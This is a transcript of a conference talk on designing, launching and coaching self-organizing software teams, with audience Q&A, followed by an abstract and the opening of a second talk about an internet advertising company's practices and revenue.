10.5446/50965 (DOI)
|
The time has arrived. Thank you for coming to my session. My name is Esther Derby and I'm here to talk to you today about self-organizing teams, what it really means. How many of you were in Mike Cohn's session on leading self-organizing teams? So some of you were, okay, I have a little different take so you might hear some different things. That's okay, there's more than one way to think about things. I want to start by asking a question. How many of you have been on a really fabulous team? Yeah, so just take 10 seconds and think about what it was like to be on that team. And now tell me in a word or two, what were some of the characteristics of those fabulous teams that you've been on? Just a word or two. Helpful? Yeah? Recommendation. Recommendation? Oh, communication. So it was helpful, there was good communication. There was motivation. Self-contained. There was a lot of cooperation. It was fun. Who else has a word about one of these great teams they've been on? Any other words? Ending with fun is not a bad word. Most of us who have had one of those team experiences always want to return to it, because it just is a fabulous way to work. I mean, you go in every day and you have ups and downs, but you're generally energized and you find you can do more than you could on your own. It's one of those experiences we always want to go back to. Making a team like that is not a random event. On the other hand, there are no guarantees, but there are some things we can do to make it more likely that the patterns of self-organization, the patterns we described within this group, where we have good communication, motivation, fun, and we're helpful to each other, all of those words, play out. There are things we can do to make that more likely to happen. That's part of what I'm going to talk about today: how you can create the conditions for self-organizing teams, what it means to managers, what it means to people on the team to be part of a self-organizing team, and then just a couple of words about coaching, because within the agile world there's a lot of emphasis on coaching. I want to say a little bit about how that plays out with self-organizing teams. Sound like a reasonable way to spend an hour? How many of you have had this experience when you started a team? We're self-organizing. We don't need no stinking managers. Does that ever come up? Yeah, there's a myth that teams don't actually need managers or management. They actually need both, but in very different ways than we're used to. Let's talk about an interesting set of numbers. What comes to mind when you see these numbers? 60, 30, 10. Any guesses about what these mean? They're percentages? Yeah, absolutely. Any idea what they refer to? This comes out of the work of a guy named J. Richard Hackman, and they reflect the sources of variation in team effectiveness and how much each source accounts for. So 60% of the variation in team effectiveness comes from the way the team is designed. When we're talking about designing, we're talking about how the team is selected, and there are lots of ways to select team members. You can appoint them using the five-yous method. Does anybody know the five-yous method of selecting a team? I bet some of you have experienced it. It goes: you, you, you, you, you. You're a team. That's not a good design principle, but there are many other ways to do it. You could self-select. You could use a process that's much like hiring. 
There are various ways to select a team. So that's one aspect of it. Thinking about the goal is another aspect of it. Thinking about the space the team will be in. All of these things are aspects of the design of the team. So that's 60% of the variation. The five-yous method does not help very much when we're looking at design of a team. Where do you think most of the time gets spent in a typical organization on helping a team excel? What would your guess be? Any guesses? In many organizations, most of the emphasis on helping a team succeed goes into coaching. So which one of those numbers do you think is related to coaching? Ten. Right. 10% of the variation is accounted for by coaching. The 30% refers to how a team is launched: how they're brought together, how the issues are presented to them, how they go about narrowing the gap in their understanding of what their task is, and how they go about figuring out how we are going to make the best use of our diverse skills, and what are our diverse skills anyway? That accounts for 30% of the variation. And those are two of the big issues in any self-organizing team: what are our diverse skills, because skills that are not held by the majority of the team members very often are not taken into account. There's some research that shows that people who have divergent knowledge have to bring that to the table 20 to 30 times before it gets heard. So the ability of a team to take advantage of all of the knowledge that's contained in the team is critical, and that's often established in the very early stages of a team. These critical initial conditions make a big difference. Also, the agreements the team makes on how they're going to work together often happen at the inception of the team and of course evolve over time. But that makes a big difference too in how the team's going to work. So the design of the team accounts for 60%, and the way the team is launched and the way their first interactions happen accounts for 30% of the variation in terms of team effectiveness. Is that number surprising to anyone? No? Okay. Well, given what I see in the US and the way people treat teams, this number surprises a lot of people. So this is good to hear that this is not surprising here in Norway. Okay. So something changed order, but that's okay. We talked about the design. Part of what goes into a team being successful is not just who's there, but whether they have enabling conditions. So enabling conditions have to do with having information about the task, having information about the context that they're in, so the big picture of the work they're doing, so they understand how their work fits into the overall picture of what the organization is doing, having access to outside expertise. Because even though you try to have a cross-functional team, there's almost inevitably something that they don't know. And rather than, you know, always disbanding and forming teams in the effort to get the perfect team, it makes more sense to have a team stay together and then have access to outside expertise for issues where they may not have the particular knowledge or skill that they need. The third pillar, which I am doing in a different order, is material support, which means that they have access to the right materials, the right computers, the right space, and all of those material things that enable them to do their work. 
And finally, a connection to the organization, which you can think of as a feedback loop that keeps them aligned with what the organization needs them to do. So in Agile, that's often the product demo that happens at the end where folks get together and show the product to the customer so that they can stay aligned with what the company actually needs the team to do. So those are the enabling conditions. Those are part of the design work, part of the design work for the team. And of course we have to consider that we have a real team. Because very often all sorts of groups of people are called teams, whether they actually meet the characteristics of a team or not. One of our American presidents once said, you can call a tail a leg, but that doesn't mean you have a five-legged dog. So you can call any group of people a team, but that doesn't mean they are an actual team. They have to have a handful of characteristics, which are that they have interdependent work. So it's not that they are each doing their own work, and somehow the sum total of that adds up, that their work is interdependent on a day-to-day basis, that they are mutually accountable and mutually responsible. So it's not a matter of, well, if you get your work done, then the devil take the rest. They are mutually accountable for the success of the whole team. They all fail or succeed together. They have complementary skills. So there may be some overlap, but each person has unique skills. There's a lot of talk in the agile world about generalizing specialists and specializing generalists. It's not the goal that everybody have exactly the same set of skills, or everybody can do every job, but that they are complementary, and the collection of the skills is sufficient to do the work at hand. And again, you may need access to outside expertise, because you're never going to have the perfect team. So that's important to consider, but complementary in general. Small in size. How many of you are on teams of three people? Yeah, that's kind of the minimum to have any sense of teaminess. If it's just two, it just doesn't feel like it's a team generally. But when you have three people, you can feel like, well, some other people have my back, we have a different set of skills, we have different viewpoints, we have a mix here that we can bring together in different styles and different knowledge. How many of you are on teams bigger than 10? Yeah, just a couple. When you have more than 10 people, it tends to break down into subgroups, either because the work naturally breaks down, the work is big enough that there's a natural breakdown in the work, or because the communication overhead is just too big to keep going with that number of people. So it will break down either on the basis of the people who have similar work, if you're lucky, or if you haven't thought about it enough, it will break down on the people who are friends or who see other people as enemies. It will break down on some random fracture line, which may not be helpful to the team. So when you get more than 10, it tends to break into subgroups. Less than three doesn't feel like a team. And according to some research, five is the ideal number of people on a team. How many of you are on a team of five? Yeah, a couple of you. The number five comes out of research again from Hackman that says, in theory, each person you add brings more capacity. 
However, each person also adds to the process overhead in terms of coordinating communication, in terms of maintaining relationships, in terms of how do you pass knowledge through the group. So at five, the process overhead starts to cancel out the theoretical capacity of another person being added to the team. And the more people you add, the less you are able to take advantage of that theoretical capacity. So five, according to some research, is the ideal. Not every team can be that. Seven, nine, they're usually reasonable. So somewhere in that range, seven plus or minus two, contributes to having a real team. I want to go back to the goal for a minute, because that's an essential characteristic of a team. It's not a design, but it is so central to a group being a team, because I have never seen a group succeed if they didn't have some sort of compelling work goal. And I have seen groups do amazing things when they do have a compelling work goal. This is something that we often don't pay a lot of attention to when we're putting groups together. We give them something like, oh, go do maintenance. How compelling is that? Create this feature. How compelling is that? It's not very interesting. People don't get engaged in it. Goals that relate to how we're going to make life better for some other people tend to be more engaging. So if you can frame the goal for the team in terms of how we are going to make life better for some other group of people, that's more likely to engage people and tap into their intrinsic motivation. Now, we have a tendency to over-specify goals. So it must do this, an X, Y, Z, A, B, C, Q, R, S, and we add on conditions and conditions and conditions until there's not much room for creativity left. So there is an art to coming up with the minimum specification for the team's goal that allows them to really take advantage of all of the diverse skills they have and make the most use of their creativity. So minimum specification and the thou shalt nots. So the goal forms a sort of boundary and thou shalt not sets out the unacceptable solutions and the behavior and the solutions that are unacceptable. So that's an equally important part of setting a goal for a team because one of the most demoralizing things that can happen to a team is that they're given a goal and they go off and do something and they think it's wonderful and they bring it back and the customer or their manager says, oh, well, anything but that. That's demoralizing. So the unacceptable solutions are equally important. One sort of silly example, well, it's not silly. It's actually an interesting example that I do some work in a workshop called Problem Solving Leadership and one of the things we do there is we design an exercise. We have teams design an exercise for the other team to solve. It's an exercise in delegation. And one of the thou shalt nots is that the exercise that you give this other team should not include killing anyone because one time a group came up with a design that said, well, we're going to pretend that we have this terrible virus and everybody's affected and we can only cure three people and you have to decide who's going to die. So that was clearly an unacceptable solution because it brings up too many horrible things for people to deal with. So thinking of the thou shalt nots is equally important as to thinking about what is the goal and what we're trying to accomplish, who are we making life better for? I'm going to skip that one. 
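A quick aside on the team-size point above: one rough way to see why capacity stops growing with headcount is to compare raw capacity, which grows linearly, against pairwise communication links, which grow as n(n-1)/2. This is only a back-of-the-envelope sketch, not Hackman's actual model; the cost-per-link figure is an assumed number chosen purely for illustration.

```python
# Illustration only: raw capacity grows linearly with team size, while the
# number of pairwise communication links grows as n*(n-1)/2. The coordination
# cost per link (0.2 "person-equivalents") is an assumed, made-up figure.
COST_PER_LINK = 0.2

def effective_capacity(n: int) -> float:
    """Toy model: n units of raw capacity minus an assumed cost per pairwise link."""
    links = n * (n - 1) // 2
    return n - COST_PER_LINK * links

for size in (3, 5, 7, 9, 10):
    links = size * (size - 1) // 2
    print(f"team of {size:2d}: {links:2d} links, effective capacity ~{effective_capacity(size):.1f}")
```

With this particular assumed cost, effective capacity in the toy model peaks right around five people and declines after that; a smaller assumed cost just pushes the peak later, but the shape, linear gains eaten by quadratic overhead, stays the same.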
One of the things that we run into when we try to have self-organizing teams is a dynamic that exists in many organizations where the managers are looking down to the team saying, you need to get some stuff done. You're empowered now. You're self-organizing. You need to make decisions. And the team is looking back up at the manager saying, hmm, I wonder if he really means it this time. Last time they told us we were empowered and only lasted for about six weeks. Does anyone ever, does that sound familiar to anyone in this group? You've had that experience? It's very common, it's very common that this dynamic is in place and this is something that we need to work against when we're moving into working with self-organizing teams. Because it's present and if we don't acknowledge it and take some steps to counteract it, then we'll run into problems. I guess the manager will say, you're empowered, make this decision. And the team will either be wondering if he really means it or they may not know how to do the decision or do the task that the manager has delegated to them. And the manager will be getting impatient and tapping his foot and the team will be saying, sooner or later the manager gets frustrated and steps in. And then they say, see, it's just like last time. He didn't mean it. So we need to attend to this dynamic. There's a couple things we can do about that as part of designing a team and launching a team. One is to be clear about what is the mix of technical and management work that people are taking on. How much self-management are they actually taking on when they become self-organizing? Many teams and manager-led teams are way on this end of the box. So they have a lot of technical work and not much work that's involved with self-management. That doesn't really allow them to take advantage of their creativity. It doesn't allow them to reach these surpassing results. It doesn't create the sort of fun team where there was good communication and people took self-responsibility and they were collaborative and helpful that we talked about at the very beginning when you told me about those teams. Nor do most teams want to be at the other end where they're doing all management work and not much technical work. I talked to one company where they had spent millions and millions and millions of dollars getting their teams to be completely self-managing. So they took on all management work. And they were doing so little technical work that many of them started leaving because they hadn't come there to do management work. They'd come there to do technical work. And eventually someone noticed that there was this huge amount of turnover and said, well, why are you leaving? A lot of people are leaving to go work at this company that's really top down and control oriented and you're going to be under your boss's thumb. Why do you want to do that? And the people said, well, at least we'll get to do the work we really are trained to do and we love to do. So we'll put up with the boss, but we'll at least get to do work we like. So there's a balance in here. There's always a balance in here. When you're looking at creating a team that's really going to be excellent, that's going to do excellent work and it's going to be a, did I get too close? Is it okay now? Sometimes when you stand too close to these, they make horrible sounds. I'll try not to do that again. Okay, my brain just rebooted. What was I talking about? 
Oh yes, the company that pushed people too far to that end of the box where they were doing too much management work. It's always a balance. You want to create a relationship where it's partnership, not all of the management shoved on to the technical teams who are trying to actually produce software and not all of the management and self management kept by the manager. It needs to be a partnership that shares power. Part of how we can look at that is by being careful about how we delegate decisions and being clear about which decisions belong to the team, which decisions stay with the manager, and which decisions are shared. This is one of the areas where teams often get into that up looking up and looking down cycle where the team will believe that they have been delegated a decision and they'll make a decision and then the manager comes back and says, no, you can't do that, which sets that dynamic up and says, you really didn't mean we're empowered. You told us we were empowered, you didn't mean it. That shuts down the team. Being clear about this is very, very helpful. I generally do an exercise when I'm launching a team, which is part of that 30% the launch, that says let's look at the sorts of decisions that typically happen and we'll figure out and we'll come to an agreement about which ones the team can take care of within some boundaries and within some thou shalt nots, which ones are shared, where we're going to make the decision together in various ways and which ones stay with management. Who can give me an example of a decision that would most likely rest completely with the team within some boundaries? Anyone? Yes? We have time to do, like, half a day we can meet the deadline and they have half a day doing something else, for example, some research. So you think that should be a team decision? Basically, I think that's a great decision for a team to make and I think in many organizations it needs management support, but that's a very interesting one because if you tell a team I want you to learn and improve but then you don't give them any time to do research, you're sending a contradictory message, right, which sets up that cycle again of oh, you don't really mean that. Yeah, so that's a reasonable thing for a team to decide. What might be a shared decision? Between the manager and the team. Everything often falls in this one as a shared decision. I think it's really critical for the team to have a very big say in who comes on to the team. They may not make the final arrangements with HR, they may not make the final salary decisions, but they should be involved in deciding what sort of skills we're looking for, what are the interpersonal characteristics we're looking for, they're involved in interviewing candidates and might be involved in pairing auditions with candidates because after all, they're the people who have to work with this person. So it's important that they have a vested interest in helping this person work, work out on the team because when the manager makes the hiring decision alone, he's the one with the most vested interest in this person succeeding. And it's very easy for the team to say, not our fault, you stuck us with this bozo, it's your problem. So I think that's a critical shared decision. I think that's really critical as a shared decision if you want a team to self-organize and be self-responsible. I think budget decisions can be shared. I think how the training budget gets spent should stay with the team. 
I think that's an important one to stay with the team because that's another one where you can send a very mixed message to a group when you say, we want you to learn and improve and you have a training budget, but then when you select a class, you must come to me and get approval. I talked to one guy who took it to heart when they delegated the training decision and selected a course he thought would be very useful, and he had to go to his manager for approval, and his manager said, well, no one in our company has taken that class, how do we know it's any good? And so the guy went back and did some research and brought that back to his manager, and he says, well, you must take it to HR now and have it vetted by HR. And he had it vetted by HR, and then he had to go on and on, and finally he just said, no, I'm not going to work at getting myself to this class anymore, because clearly you were not being honest when you told us that we had responsibility for the training budget. So when you delegate some decision like that, the money has to go with it, because it's a very confusing message to send to a team to say, you're empowered, you're self-organizing, you take responsibility for your improvement, but then you have to come to the manager on bended knee. So looking through these decisions and talking about where they're going to live is a very important thing to do, because that eliminates some of the tendency for that cycle of looking up, looking down to kick in. You guys have invisible fence here, do you know what that is? Any dog owners in the room? Yeah, well, in the US they have this thing called invisible fence, which is actually a terrible thing, but they bury electric wire in the ground and then the dog wears a collar so that if he goes across this line he gets a shock. The theory is that then the dog will learn to stay in his little box. I don't recommend it, but it does exist. But as a manager, if you're not clear and you don't negotiate with the team what the decisions are, the team ends up feeling like, you know, if we step over this line we might get shocked, and we don't know exactly where the line is buried, because it can move all the time. And if the team has that experience often enough, of crossing a line they didn't know existed, eventually they stop making any decisions. That paralyzes the team. So this is a critical, critical part of launching. Okay, within the team, for the folks on the team, there are some balancing acts that always take place. And Rashina Hoda, who did her PhD research on self-organizing Agile teams, was the first I know of to name these, but they do ring true for the teams that I've seen and worked with. So the first is balancing learning and delivery, which goes right to the point that you mentioned, that if you really want a team to learn and improve you have to balance learning and delivery. So if you say you want the team to have retrospectives and come up with actions to improve, but then you never leave any room on the plan for those pieces of improvement work to be done, there is no room for learning. On the other hand, you know, they can't be learning all the time; there's still a need, you're still a business, you need to keep the delivery in mind. So that's a balancing act that plays out for members on the team. They're always looking at that balancing act. If you don't have learning, for most people it gets to be sort of boring to be on a team. 
That's a critical part of being on a team is the ability to learn and the ability to learn together. That's really one of the core improvement units of improvement for a team. Jerry Weinberg did research long ago that showed that the possibility for improvement if you didn't have some structured way to look at it within a team was essentially random. But if you did have some structured way to look at improvement and you built the time for that, that was a critical unit of improvement within an organization, was improvement within the team, their ability to learn together, to think together, to take on new skills and later research has confirmed that teams do learn to learn together over time. So critical balancing act, something to pay attention to, and as managers, going back to the manager's role, supporting that ability by protecting some time for the team to spend on learning and improvement activities. Specialization versus our work, my specialization versus our work is another critical balancing act, and this goes back to the cross functional skills and making sure that people are making use of the diverse skills within the group, within the team. I worked with one group not too long ago who the testers were still very much in, I do testing, and the developers were still very much in, I do development. And so they would get to the end of their iteration and the developers would be done, done, as in it works on my machine and I didn't find anything that broke, and the testers would still be testing. So their work would slop over into the next iteration. So it would often be three or four iterations before they actually knew that something was done. So what we did with that group was we looked at what's our shared definition of done, and if the development is done but the testing isn't done, it doesn't count for done. So that's part of balancing what my specialization is versus our work and our goal. Our goal is to deliver this feature, not my goal is to get the development done and if the testing isn't done, well, it's not my fault. If the testing isn't done, it's a failure of the team. So balancing my work versus our work, balancing my specialization versus the needs for all of us to get our work done. I actually spoke to someone yesterday who was saying, we have a bunch of new guys on our team and they don't understand the domain and some of them are just learning the technology, but the experts, our senior guys don't want to work with them because it slows them down. So the senior guys are doing their work and being really productive and half the team is sitting there unable to do anything. So this is another one, my specialization versus our work. Yes, personally, you might go slower if you're helping the new guy, but as a team, you're developing the capability to speed up. So as a team, you're developing your capability, you're bringing everybody up, you're allowing people to be productive who weren't productive before. It plays out also in terms of specific skills like, well, I'm a database guy, you're not a database guy, so all database work has to go through me which creates a bottleneck. This guy might be able to do some database work, maybe not as fast, but he'd learn if the work were shared. 
So over time there's a diffusion of skills, so people may not become as good a database programmer, as good a UX programmer or whatever, but they gain some skill in that, and having that redundancy creates flexibility in the team and allows them to respond more effectively to challenges. So it's a balancing act, and if you keep it in balance, it creates more capability for the team over time. Flexibility leads to speed, flexibility leads to better decisions and allows the company as a whole to be more flexible in how they do work. The third balancing act has to do with autonomy and responsibility. Self-organizing teams, agile teams are given a lot of autonomy, but they also have responsibility. This ties back to that first picture of, well, we don't need no stinking managers, leave us alone. Well, you may not need the same kind of manager, but you are still a team within a context and you're responsible for producing a product. Responsible for producing a product that's valuable to the company that's paying your salary. So there's responsibility that goes with that, to be checking in with the customer, to be developing valuable software, that goes along with the autonomy that you're given. Being clear about the decision boundaries helps this one. Using those robust feedback loops with the organization helps this one, making sure that you're tied back to the organization. I talk to all sorts of groups that do all sorts of silly things. They're really smart people, but they end up doing these silly things. So it's not that I think people are stupid, it's just these are the stories that I get to hear, silly things that happen. So I talked to one group where the managers were just beside themselves, they didn't know what to do, because they had set up a self-organizing team and the team had been working for two years and hadn't produced one single bit of software. What do you think I told the managers to do? Get in there right now. So this team had gone way too far on the autonomy side. They had said, we don't need no stinking managers, don't bother us, leave us alone, we're working, we'll show you when we're ready. And that went on for two years. So they had ignored the responsibility part of this balancing act. And their managers had fallen into the trap of saying, oh no, we don't want to interfere, which leads us to the managers' balancing act. Which is, when do you step in? When do you step in? It's possible to step in too soon, which kicks in that loop of the manager and the team, with the team saying, well, he didn't really mean it when he told us we were empowered. Or you can wait too long, in which case the team feels like they've been abandoned. I talked to one group that had a person their manager had stuck on the team without any consultation. And it turned out that the guy didn't really want to follow any of the shared approaches that the team had agreed to. And they did their best to kind of bring him along and say, well, this is how we work here. And we have a stand up every day and we talk about what we've been working on. So they'd have a stand up and everybody would go around the room and say, I've been working on this feature, I've been working on this story, I'm running into this problem. And the guy that the manager had stuck on the team would say, I'm coding. They say, well, what are you coding? I'm coding, leave me alone. So this went on for a while and they tried to bring him into the fold. 
And finally they said, we never know what you're doing, so don't take any of these stories, because we need to know where they're going. And so he would surreptitiously take stories, and he would take the code and lock it on his own machine so no one else could see what was going on. They did everything they could think of, and they finally went to their manager and said, we tried everything we know how to do. And this guy that you brought to our team, he won't work with us. He goes off and he does things that take weeks, we don't know what's going on. He doesn't come to our stand ups anymore. He threatened to slap one of our team members, which he really did. He threatened to slap her. She'd had some dental work done and he said, well, then you won't even feel it. You've had Novocaine, so I can slap you all day. This is kind of bizarre behavior. So they went to their manager, and the manager just said, well, you're self-organizing. It's your problem. Solve it. They felt abandoned. Right? So there's a balancing act for managers to know when to step in. And there are ways to go about it. You can always ask if a team needs help. You can always bring the team back to the purpose. You can always reiterate what the goal of the team is and say, how do you feel you're doing on meeting that? Do you feel like you're tracking? Let's look at the evidence. You can always do that sort of thing, because sometimes that sort of feedback loop resets the team and helps them reenergize around the goal and the purpose that they're supposed to serve. You can always state what you're observing. It seems to me that you guys are struggling on this and you've been churning on this decision for a while. Here are the implications of not making the decision. Here are some ways I can help. Would that be helpful to you? At a certain point, if the team doesn't respond to those suggestions, then you can be a little more forceful. But if you start from a directive position, if you start by saying, get with it, this is what you're supposed to do, that kicks in that dynamic again. That kicks in the looking up, looking down dynamic and again reinforces to the team that you didn't really mean it when you said we were empowered and self-organizing. So we're going to be paralyzed. So that's a balancing act that takes some discernment. Okay. Something about coaching. How many of you have coaches on your teams? Anyone? One. Okay. Are these coaches that stayed with the team for a long time? Yeah. So when you think back to the 60, 30, 10: 60% of team effectiveness is related to the design, 30% to the way they're launched, 10% to coaching. But what this diagram says, and this is again from research from Hackman and one of his colleagues, Wageman, is that if you have a well-designed team and you have effective coaching, it can really help. If you have a well-designed team and you have poor coaching, it might help a little. If you have a poorly designed team and you have ineffective coaching, it's going to hurt a lot. And even if you have good coaching, it's not going to be very effective. So design is everything, right? Design is 60%. You need to really pay attention to those initial conditions for the team, so that if you have coaching, effective coaching will help the team, right? You can have a great coach, and if you have a poorly designed team, they're not going to be able to make a lot of difference. 
And the first thing that coach should probably be doing is revisiting the elements of design and making sure that those design elements are in place. There's also a paradox of coaching that came up once again for me just a couple of weeks ago when I talked to one of the teams I had worked with. And they said to me, we couldn't have done it without you, and we couldn't have done it with you. So I had spent some time with this group on their initial conditions. I spent some time with them helping them understand the tasks that they were working on, looking at the goal, looking at the shalts and the shalt-nots. I spent some time helping them figure out how they were going to work together. I spent time with them helping them to self-observe what was going on in their team, so that they could do some diagnosis of what was going on and make some changes within their team. I let them know something about the pitfalls, and then I went away. And I heard later about all this drama that happened on the team while I was away. And then I saw their result, and their result was fantastic. It was fantastic. They really did a fabulous job. And this is what they said to me. That initial setup was crucial to them. They couldn't have done it without that initial setup. But if I had stayed there the whole time, they never would have gone through some of that drama they needed to go through to really form as a team and figure out their relationships and figure out how to work together. So they needed both. They needed me there to help them with the initial conditions. They needed some space to figure out how to work together and how to be a team. Because essentially, in the end, if we want a self-organizing team, we have to set the initial conditions, and then it's up to the team as to whether they're going to really self-organize and produce and work together as a team. When we come right down to it, self-organizing really means that the team is capable of coming up with new responses and new routines based on the challenges that they're experiencing. That depends on the initial conditions that we set for the team, how we help them understand their goal, how we help them take advantage of their diverse skills, how we help them have a process that is robust and that will enable them to make decisions. It depends on how we clarify, as managers, how we're going to work with the teams. It doesn't need to be the manager who initiates that. A team member can initiate that. Any team member can say, well, let's talk about what sort of decisions we make and how we're going to make them. Because we don't want to step on your toes. We want to know what we can do, so we can do a good job without feeling like we're going outside our boundaries. That negotiation can start from either side. We need to help the team understand some things about how they're going to work together. We need to make sure they have access to outside expertise. Then we stand a chance, no guarantees, but we stand a much better chance of having a team that's going to really produce the experience that we talked about, of being fun, of being helpful, of having great communication, of producing great results. But there's still uncertainty. I think it's worth investing 60% in design and 30% in launch to give a team a great chance. Because when work works really well, it's almost always because of teams. How many of you have questions at this point? Who has questions? Yeah? 
I'm wondering, when you talk about the team and managers like this, if you have a team that has a scrum master, would that be part of the team or would that be the manager? The question was, if you have a team with a scrum master, is that part of the team or part of management? It's a tricky role. Because the scrum master's role is to help the team follow a process and help the team self-observe, they are by definition out of the team, because they are working on the meta level. Any time you have a team and one person goes meta and the other people don't, whether it is named that or not, they feel like someone who is not in the team. In your case, is the scrum master also writing code? Yeah, so he's not writing code. He's not mutually accountable in the same way that the other team members are. That goes back to the definition of the team, that they are mutually accountable to each other and they make commitments to each other. The scrum master has a different sort of role, in that he's not making commitments to doing work to create the product. The role is of the team but not in the team. Most scrum masters don't have management authority, so they can't negotiate what the decision boundaries are. They're there in a role that doesn't fit either of those and spans both of them, in that they are in a position to help the team because of their observations, if they know something about team dynamics, and a position to help the team make the best use of their resources and make good decisions about their group process, if they understand group process. If they only understand the rudiments of scrum, then that's the only thing they can help with. They're in neither world; they're in between. Did that answer your question? Other questions? Yeah? Say we have a couple of self-organized teams in the company and they make their own decisions, and perhaps some of those decisions start to nudge or change how the work process in the company is made. How big is the company? The question was, if you have two self-organizing teams, or two or more, that are starting to make decisions that affect the company work process... How big is the company? That's a theoretical question. Well, a lot of companies have the company process. What they have is the company process document. I think expecting every team to follow a rigid prescribed process is in some ways an exercise in futility and in some ways is a detriment to the ability of the team to self-organize. It depends on what level that definition is. There can be some core agreements as a company about how we act and what our process is as it relates to our ability to deliver value to our customers. As it relates to the day-to-day work of the team, if they want to come up with a process that is most effective for them, as long as it does not make someone else less effective, I'm fine with that. I don't think every team has to hew to the same process or stick to the same process, because they're working on a different problem. They've got a different group of people. They're under different conditions in various sorts of ways. It seems normal to me that they would develop their own unique way of dealing with the situation. Otherwise, they're not taking advantage of the skills they have. The key is: is it making it harder for someone else to do their work? That's another question of local optimization versus global optimization. Did I answer your question? Other questions about this curious thing called the self-organizing team? 
I'm sorry, I almost didn't see your hand. The question is, if you're putting together a great team, you're putting together good teams. You're trying to pay attention to the design of a team. You've found a place for all of the people who are the good performers and then you have some people who are not so good. What do you do with them? First I try to get really curious about why they're not so good. Presumably, when you hired them, you hired them because they were a good fit. That's what I presume. Then I try to figure out why have they not lived up to what was perceived as being the potential. Are they lacking some key skills? Can we get them the skills so that they will be contributing team members? Some people just aren't cut out for teamwork. If you get people who just absolutely, positively cannot work on a team because of their interpersonal skills or their psychological profile, then sometimes there's work that can be done by a single person. I might try to find that sort of work. If they've just been having a negative experience or they weren't engaged in their work because the goal was stated in such a way that no one would engage in it, then I might give them a try on a team. I think it depends on precisely what the issue is and if I feel like they can still provide some value in one of the teams and not be destructive to the team. The question really is should you raise their skill levels before they enter a team or should they do that sort of improvement within the team? The second part of the question is should they raise their skill levels before they go on to a team or do it as part of a team? I would say do it as part of a team because people just learn better when they're actually doing something that makes sense. Then you have to take that into account when you are looking at what you expect the team to produce because they will, you know, the learning curve always takes time and it will in the short term take some time for the rest of the team. I thought there's a woman in the US, Nancy Von, this long Dutch name that no one can pronounce so we just call her Nancy Van S. If there's anyone Dutch they might be able to pronounce it in the room. She took a team that had been identified as the losers, you know, it's like here Nancy you get this team that's the losers. Oh joy, oh happy day. But she decided to not look at them as losers and she slowly but surely introduced all of the XP practices to them and they actually ended up doing great stuff. They ended up actually doing really good work. So there was something else going on with that team and I've seen that happen more than once. There are people who should not be employed in your company. Maybe they should be employed for the competition. I don't know how difficult it is to actually go through the process of terminating employment in Norway. Extremely difficult. And sometimes I think even though it's extremely difficult, that's what you have to do. He was fired but it was a US company. So excuse me, can I get you to turn this off for just a minute? I'm good now. Thank you. You didn't want to hear me cough in your ears and magnified did you? Not my mouth. Now I think I'm okay. I hope I'm okay. Right, so this is not a defense against difficult questions. 
The thing you have to be careful about with these folks who just, for whatever psychological reason, can't work with a team is that not giving them work is such an assault to their sense of self that I know of at least one instance where someone was very, very difficult, and so they denied him all work. They just said, you go sit at that desk over there and don't do any work. And he committed suicide. So it's a tricky thing, right? Because software development is too hard to have someone on your team who is acting as a boat anchor, right? And just arguing all the time and holding the team back. On the other hand, you know, work is really associated with self-worth, so you have to figure out a way to work it out. And sometimes the best way is to deal with the really difficult thing of getting someone out of your company. I assume it costs money to do that, money and management time, and there's a tradeoff between how much drag it is putting on the team, how much lost productivity you have because of this, versus what it takes to actually terminate employment. And if you look at the impact on the other team members, it's very often an equal equation, plus it depresses the morale. So once you make the move, the morale often goes up. But again, I am not familiar with the Norwegian employment laws. So that's the best I can offer you. Alright, other questions? Yes. I think it really depends on the situation of the team. So I think it's helpful for them to have a coach when they start. I think it's helpful for people to have a coach if they have a fairly large group and they need to make decisions, because they'll need facilitation. It's helpful for a team to have a coach if they are taking on some new processes or a new skill, a technical skill. I think it can be helpful when they've done some retrospectives and they want to make a significant change. That's my experience. The research I've read about this, which again comes from these fine folks, says that the most effective coaching happens during launching, when you're getting them started, and then about halfway through their work together. Because they've done some things together and they've had a chance to work together, and they might have a better idea about where they want to make some changes. Coaching is very trendy in the U.S. too. I think, one, you need to be real clear about what sort of coach you need for what team. You need to start, again, with a job analysis so you pick the right person for the right team. Thank you for coming to my talk. I think it had better be over now, because my voice is just about gone.
|
“Self-organizing team” may be the most overused, misunderstood, vague, and misleading phrase of the decade. So what is a self-organizing team? How are self-organizing teams different from other teams? How can managers and team members get the self-organizing mojo going? What are the challenges that self-organizing teams face? In this workshop, we’ll explore all these questions and get beyond the buzzword.
|
10.5446/50966 (DOI)
|
So, while we're maybe waiting for a few stragglers to come in, let me understand my audience here. How many people are scrum masters, or see themselves as kind of not programmers as their major role in the company? Okay. Sorry, I apologize to you before I start. I'm going to be perhaps insulting you. Yeah, which half? You'll have to tell me if you've both been insulted. I'm equal opportunity. So my name is Fred George. I'm originally American, but I've lived in London for the last six years. I'm doing some interesting work for an interesting company. So that's what I'm going to talk about today. There have been a lot of sessions here so far, especially in this room, around teams and how teams work and some theories behind that and the like. I'm only going to talk about what I've actually done. So I'm not necessarily the guy who's going to read the books. I kind of come to these sessions myself so I can understand without having to read the book, because other people have read the books and they tell us about them. I like that. I'm lazy. But this is my experience at a company called Forward. It's an internet advertising firm in London, although it's kind of hard to say what we really do, because we have these various commercial and consumer-oriented products. And there's almost no rhyme or reason to these products. We have uSwitch, which is actually an energy switching firm. You can switch energy plans in the UK the same way most people switch phone plans. But you can do that with your energy. Invisible Hand is a browser plug-in that does dynamic price comparison based on what page you're looking at. It runs in all the browsers. Omio is phone comparison. Petvilla is selling pet products. We have cornered the market on parrot cages in the UK. So again, where's the theme here? Lightbird is also cages. Forward3D is actually an internet advertising agency. We do advertising in 15 different languages for various clients across the world. We put a lot of Google keywords up there. In fact, for just one client alone, we have 40 million keywords that we manage. Generally, a big account is 50,000. So we've used technology to push that three orders of magnitude above that. So there's really no theme to that. What you'll see is we're basically opportunistic, we basically think that speed is a competitive advantage, and we leverage technology like crazy. So, sorry, we have a bit of an advantage with the audience in here. I want to talk about our success, because sometimes our success is driven by some of the strange things we're doing. We're doing strange things, but we're making a lot of money doing these strange things. And that's usually important to point out. So if you look at the performance of the company, it's not that old. It's only been around for about seven years now. And it's got the typical hockey-stick curve that you like to see for our revenue. So in fact, the last year I show here is 2009 officially, although 2010 numbers are actually out officially now. But we had 55 employees. We made 55 million pounds. So it's a million quid per employee. That puts us in rarefied territory. And it also can hide a lot of mistakes. So we were actually anticipating that, and by the way, the profits were actually starting to soar as well. We started to make a lot of money off of this. We projected that in 2010 we'd do 100 million and 15 million profit. We actually did 120 million and 23 million profit. 
